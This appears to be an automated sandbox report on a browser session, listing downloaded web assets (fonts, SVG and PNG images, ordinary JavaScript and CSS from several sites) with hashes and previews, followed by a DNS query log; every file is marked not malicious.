            Preview:/* latin-ext */.@font-face {. font-family: 'Urbanist';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/urbanist/v15/L0x-DF02iFML4hGCyMqrbS10ig.woff2) format('woff2');. unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Urbanist';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/urbanist/v15/L0x-DF02iFML4hGCyMqlbS0.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'Urbanist';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/urbanist/v15/L0x-DF02iFML4hGCyMqrbS10ig.woff2) format
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):3857
            Entropy (8bit):4.5794716462664375
            Encrypted:false
            SSDEEP:96:xH/UhQQqOcGPFVAduL8UY/2rBHxY7XcXyicxAthTD+65w:tRgJFY/2rBxYTmyGCb
            MD5:DA43438BED46DFC10A9800655577228D
            SHA1:65EB7A45B4B0A62E53970EAC81096A275C5C4D70
            SHA-256:692AD46320BE0ABCB5805CB3032F22B21DACE9EE1DC5819CA6184D5EA6672201
            SHA-512:B3FF64B712F976F3530F0BCB1BF30B8E544A64BFCC195EEA76643207B7FB30279146E39914B95A2A8EE1F843D57519F0EAB298178DAC836A7A6BFF49E4A5493E
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/layout/images/65.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <defs>.. <linearGradient x1="0.777364" y1="0.086554565" x2="0.07414896" y2="1" id="gradient_1">.. <stop offset="0" stop-color="#9039A6" />.. <stop offset="0.45807952" stop-color="#DC376F" />.. <stop offset="1" stop-color="#FA9126" />.. </linearGradient>.. <linearGradient x1="1.5520687" y1="-0.6829178" x2="0.07414896" y2="1" id="gradient_2">.. <stop offset="0" stop-color="#9039A6" />.. <stop offset="0.45807952" stop-color="#DC376F" />.. <stop offset="1" stop-color="#FA9126" />.. </linearGradient>.. </defs>.. <g id="instagram-(3)" opacity="0.90000004">.. <path d="M22.9415 6.76208C22.8877 5.54 22.69 4.69983 22.4068 3.97181C22.1147 3.19904 21.6653 2.50717 21.0766 1.93202C20.5013 1.34792 19.8047 0.894053 19.0408 0.606566C18.3084 0.323467 17.4725 0.125841 16.25
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 800 x 850, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):54471
            Entropy (8bit):7.926068366197067
            Encrypted:false
            SSDEEP:768:175+K6SSf93xhlzpzttxnkMZaCtz46A3ITjfjpPQzMW4d4er9gvigSAHouyBT9M:175T+h/1zbKCtzE3wjOwPCmQTSAHQT9M
            MD5:7645B823B9F59AB3F1ADCB7455DA9092
            SHA1:11553404B293001DB971FE907730F4CDCC26093D
            SHA-256:D0CCAFECF1CDD4B92EA67E00E422988959FD9EAB5E29CBA1E5870E72419D411B
            SHA-512:4C9A61CEC840DFE77EAB1380F78E7368DA2C7A572230F335F73B0714C0A8DE9ADA009D4FB8E33805D38F88D02E40E4F1F6CCDE241ACFBEE3BAC304197BF73ABD
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/logos-clientes2.png
            Preview:.PNG........IHDR... ...R.............pHYs.................sRGB.........gAMA......a....\IDATx.....%U...o.D....YrN.%g.. ..b...G..`vt..s@EAP....,.I.;.....U..U.N.>...y..t..'.9]..^k.=..._..$I....I.$Ij...$I.....H.$Ij...$I.....H.$Ij...$I.....H.$Ij...$I.....H.$Ij...$I.....H.$Ij...$I.....H.$Ij...$I.....H.$Ij...$I.....H.$Ij...$I.....H.$Ij...$I.....H.$Ij...$I.....H.$Ij...$I.....H.$Ij.LA...=..c..4iR.$.)3 .$I.Zc."I.$.5. .$I.Zc."I.$.5. .$I.Zc."I.$.5. .$I.Zc."I.$.5. .$I.Zc."I.$.5. .$I.Zc."I.$.5. .$I.Zc."I.$.5. .$I.Zc."I.$.5. .$I.Zc."I.$.5. .$I.Zc."I.$.5. .$I.Zc."I.$.5. .$I.Zc."I.$.5. .$I.Zc."I.$.5. .$I.Zc."I.$.5. .$I.Zc."I.$.5. .$I.Zc."I.$.5. .$I.Zc."I.$.53......_.W^.3.0C.q...k^c.*I.......3.<.n...p.=...{.~m.Yf..,.@Xk......$I...f.<y.A. .8..../...M...W_...<..a...K,.D.4}y..'..>i. IRS..(....sNx..+..^.'.|rx..$I.....!.q......u...^x!..o...$IR.. ......>.`...b6D.$I...D.<..].....dK.$I...D.<..].<.y.H.$.....C..n.nD.$I...D.$IRk.@$I.$...D.$IRk.@$I.$...D.$IRk.@$I.$...D.$IRk.@$I.$...D.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 900 x 482, 8-bit/color RGBA, non-interlaced
            Category:dropped
            Size (bytes):51025
            Entropy (8bit):7.939141782982505
            Encrypted:false
            SSDEEP:1536:r1iO2ft5urzFNWW/r8I5dO4ATMOVEtMNpST/EA6W:5iO2ftczFf/r8MmOZqW
            MD5:8E8D5CA57E1637C852FA76D427CA3629
            SHA1:F2E2C3D5E66602DB808AC72E0321C47DB8CC8AB2
            SHA-256:0C7FFB070F449E091841923DF40F92B066541AF7A477FD861E41D360A757BBC3
            SHA-512:F410377CCB9FCAEE7766850C99148E75D2AADB7A1B1ACD8F28C9242A08911FCEE7B5C1AC9457388FCFB40042FC86799600FB0E470CF2BA8DA6372D858D02E454
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR..............|.U....tEXtSoftware.Adobe ImageReadyq.e<....IDATx....xTU...sg&..J(R.D@.."....b].c]u...V%..*`o.W]{[.7.DTD@DT:$.)IH..3s...,..d&3.L..=.u....3.s.S...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."."g..+...h......X.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):723
            Entropy (8bit):5.176013741006285
            Encrypted:false
            SSDEEP:12:TMHd4ln5cQiYxJNHlCVnu5BQo+6QkY0MlPyMbOCsCbyP6ulMlpKGhHSKjG/:2dUn5cIxJ+4QK1Y0Oy8tbyP6shGhjj2
            MD5:F4D98F8C78FBFCBCCEBF3DDEE8C57FCD
            SHA1:CC326C8EAC2B0F090FE47CB21166EB2918AC65AB
            SHA-256:B45C8BBB431137470629CF552EC70D10150870634F3A895E9850C3809E02BCFB
            SHA-512:D1CE671E76CF356C1D8AAB4F33DAB034629D6A39B2A9E686E5EB8CB794EAEA0F24ED9AEACF6AF30CFC43212BA73D7BB64BE2C9CF56C4D610F0528BC306FB166F
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/layout/images/47.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="15px" viewBox="0 0 23 15" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="colombia-(2)">.. <path d="M0 2.03535C0 2.98231 0.771174 3.75 1.72253 3.75L21.2775 3.75C22.2288 3.75 23 2.98235 23 2.03535L23 0L0 0L0 2.03535Z" transform="translate(0 11.25)" id="Path" fill="#FF4B55" stroke="none" />.. <path d="M21.2775 0L1.72253 0C0.771174 0 0 0.767645 0 1.71465L0 7.5L23 7.5L23 1.71465C23 0.767645 22.2288 0 21.2775 0Z" id="Path" fill="#FFE15A" stroke="none" />.. <path d="M0 0L23 0L23 3.74991L0 3.74991L0 0Z" transform="translate(0 7.5)" id="Rectangle" fill="#41479B" stroke="none" />.. </g>..</svg>
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (14239), with no line terminators
            Category:downloaded
            Size (bytes):14239
            Entropy (8bit):5.33042281088163
            Encrypted:false
            SSDEEP:384:3I2fNaC8QiHbcggNFUWTgMe91sa6XCZy54:42fNaC8QiHbfgNFUWg17slXCZy54
            MD5:70B4897108480DBE11C443C2AB7679C9
            SHA1:70DBFD38A0F1FC3B1A7D9FADAB58786484C34F17
            SHA-256:F268612BA59EAD1B24353BB77D66783BCC435AFF1C22BE5F93C40BAC3869968E
            SHA-512:466084FA711D299E394E96C2260BD8BDF103CF75DA8869934C997A19FC884D6DDFA2E92CE253533A4A0C5D627D580E9A40EFB7155F1C8C0E9FBD3A2C3A06C2AE
            Malicious:false
            Reputation:low
            URL:https://unpkg.com/aos@2.3.1/dist/aos.js
            Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.AOS=t():e.AOS=t()}(this,function(){return function(e){function t(o){if(n[o])return n[o].exports;var i=n[o]={exports:{},id:o,loaded:!1};return e[o].call(i.exports,i,i.exports,t),i.loaded=!0,i.exports}var n={};return t.m=e,t.c=n,t.p="dist/",t(0)}([function(e,t,n){"use strict";function o(e){return e&&e.__esModule?e:{default:e}}var i=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(e[o]=n[o])}return e},r=n(1),a=(o(r),n(6)),u=o(a),c=n(7),f=o(c),s=n(8),d=o(s),l=n(9),p=o(l),m=n(10),b=o(m),v=n(11),y=o(v),g=n(14),h=o(g),w=[],k=!1,x=document.all&&!window.atob,j={offset:120,delay:0,easing:"ease",duration:400,disable:!1,once:!1,startEvent:"DOMContentLoaded",throttleDelay:99,debounceDelay:50,disableMutationObserver:!1},O=function(){var e=argum
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:assembler source, ASCII text, with CRLF line terminators
            Category:downloaded
            Size (bytes):40299
            Entropy (8bit):4.914126944613458
            Encrypted:false
            SSDEEP:192:zPM6yK9SaZUhRTBiGzrk9r55wSRrWvLVbg4dtBkX80FfFwLxJUWuQBspPbOV1iqb:zBHwAaDjBUsW2jd
            MD5:3D41439DA0C63906EF1376F2D045AC60
            SHA1:2D205ED5AF93E38E2A661B2D616B002FCE864E9F
            SHA-256:FB5CB230DED64E8B57E11DB04F322EB6B488F0CBFAFF74F58505F9F49A469F8C
            SHA-512:6E7E796497BE0DDAADDB730133714D51E6BA6C86C6A870799DFBDA4A482CFFEFB9046CA50A1A14B898B1DA8D3255372D10C18B6A433683C142B69AAE7B2FE64A
            Malicious:false
            Reputation:low
            URL:https://mobile.servientrega.com/WebSitePortal/assets/css/appb.css
            Preview:..@import url('https://fonts.googleapis.com/css2?family=Urbanist:wght@600&display=swap');....body{ .. font-family: 'Urbanist', sans-serif;..}....input-field input::placeholder {...font-family: 'Urbanist';..}....../* +++++++++++++++++++++++++++++ RastreoEnvio.html */....[type=radio]:not(:checked)+label:after, [type=radio]:not(:checked)+label:before {.. border: 1px solid #5a5a5a;..}....[type=radio]:checked+label:after{-webkit-transform:scale(1.10);transform:scale(1.10)}..[type=radio]:checked+label:after{.. border:1px solid #009a44; .. background: rgb(0,154,68);.. background: radial-gradient(circle, rgba(0,154,68,1) 41%, rgba(138,209,170,1) 42%, rgba(238,248,243,1) 43%, rgba(255,255,255,0.022846638655462215) 100%); ..}....div div.bg_buscador_rast img {.. height: 39px;.. display: inline-block;.. vertical-align: middle;.. margin: 50px auto 15px;.. width: 102px;..}....h1.h1classRastreoEnvio{ .. text-transform: none;.... color: #4b4b4b;.. fon
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (65004)
            Category:downloaded
            Size (bytes):72393
            Entropy (8bit):5.412766921199588
            Encrypted:false
            SSDEEP:1536:zyLbgs0Mb17QRA3iovGlNORlHakoOoz0y5gTNNty4jfKRYGCgGBT3E:NlNilbo52TNnXy6u
            MD5:515B44A297516BCCEF87B80A83624909
            SHA1:865C4559C9D3EF804F4E6316BF054971BF0CE3B3
            SHA-256:D10569FAAA5FF0AB369C03D7FB3F63ECBD35B5F4AB5782FA3C230E09BD6F97DA
            SHA-512:EBA80874122547C44AA2BF48F7B4A387F11C1BA5468FEF4FA3CC5A171EA7DE41A9515E2AE4EF1297957C3DB600E94D60FD6365FF3EB838A84C58533910D13DB2
            Malicious:false
            Reputation:low
            URL:https://js.hs-banner.com/v2/22144436/banner.js
            Preview:var _hsp = window['_hsp'] = window['_hsp'] || [];._hsp.push(['setBannerSettings', {}]);._hsp.push(['setCustomizationSettings', {}]);._hsp.push(['addCookieDomain', '.hsforms.com']);._hsp.push(['addCookieDomain', '.hubspot.com']);._hsp.push(['addCookieDomain', '.uzer.co']);._hsp.push(['addCookieDomain', '.hubspotpagebuilder.com']);._hsp.push(['addCookieDomain', '.uzerdev.com']);._hsp.push(['setApiBaseUrl', 'https://js.hs-banner.com/v2']);./**. * HubSpot Cookie Banner Code Copyright 2024 HubSpot, Inc. http://www.hubspot.com. */.!function(e){var t={};function n(o){if(t[o])return t[o].exports;var i=t[o]={i:o,l:!1,exports:{}};e[o].call(i.exports,i,i.exports,n);i.l=!0;return i.exports}n.m=e;n.c=t;n.d=function(e,t,o){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:o})};n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"});Object.defineProperty(e,"__esModule",{value:!0})};n.t=function(e,t){1&t&&(e=n(e));if(8&t)return
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text
            Category:downloaded
            Size (bytes):2456
            Entropy (8bit):4.700142282328592
            Encrypted:false
            SSDEEP:48:kMBD/PEzC2irDic9iiTc1iihDicaiiV3puzs6UlYTy74aDTPcblVH1ABs:P9vkOlrk3blMs
            MD5:02B4EEFF6C58E94B969BF795AE2F59FB
            SHA1:A7BACFF5ABD64C42C006A90331807969B17CB772
            SHA-256:120F347C860D19E01A47FD2046FCFC47682B94452422A9FBC987546EEC208DB5
            SHA-512:1B4BBE1C770613EFA0B8A83E7F4D69DD33850815789821C3EE4866AACBD791417833CFC8F7EF7AC1553BA96DC1428457BD38DAF13F4607E05BC6D3C1CA14ECC1
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/js/main-08.js
            Preview:jQuery(document).ready(function($) {..//-------------------------- STICKY MENU....//-------------------------- FUNCIONES RESPONSIVE.... var alterClass = function() {. var ww = document.body.clientWidth;. if (ww < 950) {. $('.menu-container').addClass('offcanvas offcanvas-start').attr("visibility", "visible");. $('.submenu-collapse').removeClass('show');. $('.first-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');. $('.second-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');. $('.sub-menu-container').addClass('collapse');... } else if (ww >= 951) {. $('.menu-container').removeClass('offcanvas offcanvas-start').attr("visibility", "hidden");. $('.submenu-collapse').addClass('show');. $('.first-lvl').removeClass('collapsed');.. $('.second-lvl').removeClass('collapsed');. $('.sub-menu-container').removeClass('collapse');... }. if (ww < 769) {. $('.menu-tabs-listing').removeClass('show').addCla
            No static file info
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Sep 27, 2024 02:29:28.069242001 CEST192.168.2.61.1.1.10xec45Standard query (0)qdjtq.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:29:28.069463968 CEST192.168.2.61.1.1.10xeea5Standard query (0)qdjtq.com65IN (0x0001)false
            Sep 27, 2024 02:29:28.426184893 CEST192.168.2.61.1.1.10x7916Standard query (0)qdjtq.com65IN (0x0001)false
            Sep 27, 2024 02:29:31.030585051 CEST192.168.2.61.1.1.10x6e51Standard query (0)www.google.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:29:31.031164885 CEST192.168.2.61.1.1.10x56d9Standard query (0)www.google.com65IN (0x0001)false
            Sep 27, 2024 02:29:33.048044920 CEST192.168.2.61.1.1.10x684eStandard query (0)qdjtq.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:29:33.048554897 CEST192.168.2.61.1.1.10x2c67Standard query (0)qdjtq.com65IN (0x0001)false
            Sep 27, 2024 02:29:33.474123001 CEST192.168.2.61.1.1.10x7e25Standard query (0)qdjtq.com65IN (0x0001)false
            Sep 27, 2024 02:30:08.901912928 CEST192.168.2.61.1.1.10xd3a4Standard query (0)www.servientrega.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:08.902249098 CEST192.168.2.61.1.1.10x14f4Standard query (0)www.servientrega.com65IN (0x0001)false
            Sep 27, 2024 02:30:09.969381094 CEST192.168.2.61.1.1.10xfd27Standard query (0)www.servientrega.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:09.969552040 CEST192.168.2.61.1.1.10x295bStandard query (0)www.servientrega.com65IN (0x0001)false
            Sep 27, 2024 02:30:14.586848974 CEST192.168.2.61.1.1.10xab66Standard query (0)www.servientrega.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:14.587373972 CEST192.168.2.61.1.1.10x1806Standard query (0)www.servientrega.com65IN (0x0001)false
            Sep 27, 2024 02:30:16.247850895 CEST192.168.2.61.1.1.10xa8eaStandard query (0)s.go-mpulse.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:16.248243093 CEST192.168.2.61.1.1.10xcfb2Standard query (0)s.go-mpulse.net65IN (0x0001)false
            Sep 27, 2024 02:30:16.260730028 CEST192.168.2.61.1.1.10x4946Standard query (0)mobile.servientrega.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:16.260870934 CEST192.168.2.61.1.1.10x24cbStandard query (0)mobile.servientrega.com65IN (0x0001)false
            Sep 27, 2024 02:30:16.261699915 CEST192.168.2.61.1.1.10x753fStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:16.261939049 CEST192.168.2.61.1.1.10xee4Standard query (0)code.jquery.com65IN (0x0001)false
            Sep 27, 2024 02:30:17.064554930 CEST192.168.2.61.1.1.10xc296Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:17.065062046 CEST192.168.2.61.1.1.10xb3f3Standard query (0)code.jquery.com65IN (0x0001)false
            Sep 27, 2024 02:30:17.273288965 CEST192.168.2.61.1.1.10x23faStandard query (0)mobile.servientrega.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:17.273473978 CEST192.168.2.61.1.1.10x7553Standard query (0)mobile.servientrega.com65IN (0x0001)false
            Sep 27, 2024 02:30:17.536600113 CEST192.168.2.61.1.1.10x6e8Standard query (0)s.go-mpulse.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:17.536724091 CEST192.168.2.61.1.1.10xe0e5Standard query (0)s.go-mpulse.net65IN (0x0001)false
            Sep 27, 2024 02:30:17.554615974 CEST192.168.2.61.1.1.10x6378Standard query (0)c.go-mpulse.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:17.554771900 CEST192.168.2.61.1.1.10x2cb2Standard query (0)c.go-mpulse.net65IN (0x0001)false
            Sep 27, 2024 02:30:19.299242020 CEST192.168.2.61.1.1.10x407fStandard query (0)c.go-mpulse.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:19.299395084 CEST192.168.2.61.1.1.10x7969Standard query (0)c.go-mpulse.net65IN (0x0001)false
            Sep 27, 2024 02:30:19.461185932 CEST192.168.2.61.1.1.10xaf1aStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:19.461323977 CEST192.168.2.61.1.1.10xdd97Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
            Sep 27, 2024 02:30:20.301067114 CEST192.168.2.61.1.1.10xc38eStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:20.301067114 CEST192.168.2.61.1.1.10xa1d9Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
            Sep 27, 2024 02:30:21.275738001 CEST192.168.2.61.1.1.10x4e78Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:21.276299953 CEST192.168.2.61.1.1.10x99e5Standard query (0)connect.facebook.net65IN (0x0001)false
            Sep 27, 2024 02:30:22.907107115 CEST192.168.2.61.1.1.10x7b63Standard query (0)analytics.google.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:22.907449007 CEST192.168.2.61.1.1.10x3434Standard query (0)analytics.google.com65IN (0x0001)false
            Sep 27, 2024 02:30:22.975119114 CEST192.168.2.61.1.1.10x9a95Standard query (0)td.doubleclick.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:22.975809097 CEST192.168.2.61.1.1.10x30c6Standard query (0)td.doubleclick.net65IN (0x0001)false
            Sep 27, 2024 02:30:24.126497030 CEST192.168.2.61.1.1.10xa92fStandard query (0)mobile.servientrega.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:24.126637936 CEST192.168.2.61.1.1.10x19d9Standard query (0)mobile.servientrega.com65IN (0x0001)false
            Sep 27, 2024 02:30:24.147402048 CEST192.168.2.61.1.1.10xb8c2Standard query (0)snap.licdn.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:24.147833109 CEST192.168.2.61.1.1.10xb180Standard query (0)snap.licdn.com65IN (0x0001)false
            Sep 27, 2024 02:30:24.440975904 CEST192.168.2.61.1.1.10x77cfStandard query (0)www.facebook.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:24.441464901 CEST192.168.2.61.1.1.10xe0b2Standard query (0)www.facebook.com65IN (0x0001)false
            Sep 27, 2024 02:30:24.819381952 CEST192.168.2.61.1.1.10x7603Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:24.819566965 CEST192.168.2.61.1.1.10xe439Standard query (0)connect.facebook.net65IN (0x0001)false
            Sep 27, 2024 02:30:25.137016058 CEST192.168.2.61.1.1.10xf05Standard query (0)mobile.servientrega.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:25.137433052 CEST192.168.2.61.1.1.10x8052Standard query (0)mobile.servientrega.com65IN (0x0001)false
            Sep 27, 2024 02:30:25.221246958 CEST192.168.2.61.1.1.10x5a4Standard query (0)px.ads.linkedin.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:25.221774101 CEST192.168.2.61.1.1.10x486Standard query (0)px.ads.linkedin.com65IN (0x0001)false
            Sep 27, 2024 02:30:25.690673113 CEST192.168.2.61.1.1.10xf371Standard query (0)snap.licdn.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:25.690988064 CEST192.168.2.61.1.1.10x5aa5Standard query (0)snap.licdn.com65IN (0x0001)false
            Sep 27, 2024 02:30:26.406400919 CEST192.168.2.61.1.1.10x9cf6Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:26.406666040 CEST192.168.2.61.1.1.10x4e31Standard query (0)www.facebook.com65IN (0x0001)false
            Sep 27, 2024 02:30:26.416522980 CEST192.168.2.61.1.1.10x91b7Standard query (0)px.ads.linkedin.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:26.416646004 CEST192.168.2.61.1.1.10x2d5bStandard query (0)px.ads.linkedin.com65IN (0x0001)false
            Sep 27, 2024 02:30:27.544248104 CEST192.168.2.61.1.1.10xca41Standard query (0)sth0d7m9clo4y72mjm8vh3.s.decidata.tvA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:27.544663906 CEST192.168.2.61.1.1.10x82b2Standard query (0)sth0d7m9clo4y72mjm8vh3.s.decidata.tv65IN (0x0001)false
            Sep 27, 2024 02:30:27.545741081 CEST192.168.2.61.1.1.10xc3a1Standard query (0)tracker.metricool.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:27.545968056 CEST192.168.2.61.1.1.10x97bdStandard query (0)tracker.metricool.com65IN (0x0001)false
            Sep 27, 2024 02:30:28.570672989 CEST192.168.2.61.1.1.10xba3cStandard query (0)tracker.metricool.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:28.570831060 CEST192.168.2.61.1.1.10xd76fStandard query (0)tracker.metricool.com65IN (0x0001)false
            Sep 27, 2024 02:30:28.621731043 CEST192.168.2.61.1.1.10xf802Standard query (0)sth0d7m9clo4y72mjm8vh3.s.decidata.tvA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:28.621876001 CEST192.168.2.61.1.1.10xc760Standard query (0)sth0d7m9clo4y72mjm8vh3.s.decidata.tv65IN (0x0001)false
            Sep 27, 2024 02:30:29.946686983 CEST192.168.2.61.1.1.10x56fcStandard query (0)stats.g.doubleclick.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:29.947602034 CEST192.168.2.61.1.1.10xabddStandard query (0)stats.g.doubleclick.net65IN (0x0001)false
            Sep 27, 2024 02:30:30.045285940 CEST192.168.2.61.1.1.10x4a3cStandard query (0)www.linkedin.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:30.045285940 CEST192.168.2.61.1.1.10x5c23Standard query (0)www.linkedin.com65IN (0x0001)false
            Sep 27, 2024 02:30:30.602760077 CEST192.168.2.61.1.1.10x9502Standard query (0)tracker.metricool.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:31.616914988 CEST192.168.2.61.1.1.10x9502Standard query (0)tracker.metricool.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:32.629611015 CEST192.168.2.61.1.1.10x9502Standard query (0)tracker.metricool.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:34.636466980 CEST192.168.2.61.1.1.10x9502Standard query (0)tracker.metricool.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:38.646491051 CEST192.168.2.61.1.1.10x9502Standard query (0)tracker.metricool.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:40.902652979 CEST192.168.2.61.1.1.10xc869Standard query (0)uzer.coA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:40.902894020 CEST192.168.2.61.1.1.10x1c1Standard query (0)uzer.co65IN (0x0001)false
            Sep 27, 2024 02:30:41.737677097 CEST192.168.2.61.1.1.10x6390Standard query (0)owlcarousel2.github.ioA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.738148928 CEST192.168.2.61.1.1.10xfdf9Standard query (0)owlcarousel2.github.io65IN (0x0001)false
            Sep 27, 2024 02:30:41.739624977 CEST192.168.2.61.1.1.10xed0aStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.739901066 CEST192.168.2.61.1.1.10x4df3Standard query (0)code.jquery.com65IN (0x0001)false
            Sep 27, 2024 02:30:41.742768049 CEST192.168.2.61.1.1.10x3a6bStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.743649006 CEST192.168.2.61.1.1.10xf973Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
            Sep 27, 2024 02:30:41.753516912 CEST192.168.2.61.1.1.10xf282Standard query (0)use.fontawesome.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.753945112 CEST192.168.2.61.1.1.10x4f56Standard query (0)use.fontawesome.com65IN (0x0001)false
            Sep 27, 2024 02:30:41.754374981 CEST192.168.2.61.1.1.10xf42eStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.754868984 CEST192.168.2.61.1.1.10xc0d3Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
            Sep 27, 2024 02:30:41.756129026 CEST192.168.2.61.1.1.10xa07aStandard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.757038116 CEST192.168.2.61.1.1.10x3f65Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
            Sep 27, 2024 02:30:41.761940002 CEST192.168.2.61.1.1.10x9749Standard query (0)unpkg.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.762593985 CEST192.168.2.61.1.1.10xf39fStandard query (0)unpkg.com65IN (0x0001)false
            Sep 27, 2024 02:30:45.861221075 CEST192.168.2.61.1.1.10xb1bcStandard query (0)owlcarousel2.github.ioA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:45.861887932 CEST192.168.2.61.1.1.10x687bStandard query (0)owlcarousel2.github.io65IN (0x0001)false
            Sep 27, 2024 02:30:47.181878090 CEST192.168.2.61.1.1.10xa86cStandard query (0)uzer.coA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:47.182125092 CEST192.168.2.61.1.1.10xbcd4Standard query (0)uzer.co65IN (0x0001)false
            Sep 27, 2024 02:30:47.294504881 CEST192.168.2.61.1.1.10x4ee6Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:47.294979095 CEST192.168.2.61.1.1.10xc252Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
            Sep 27, 2024 02:30:48.578128099 CEST192.168.2.61.1.1.10xc17aStandard query (0)unpkg.comA (IP address)IN (0x0001)false
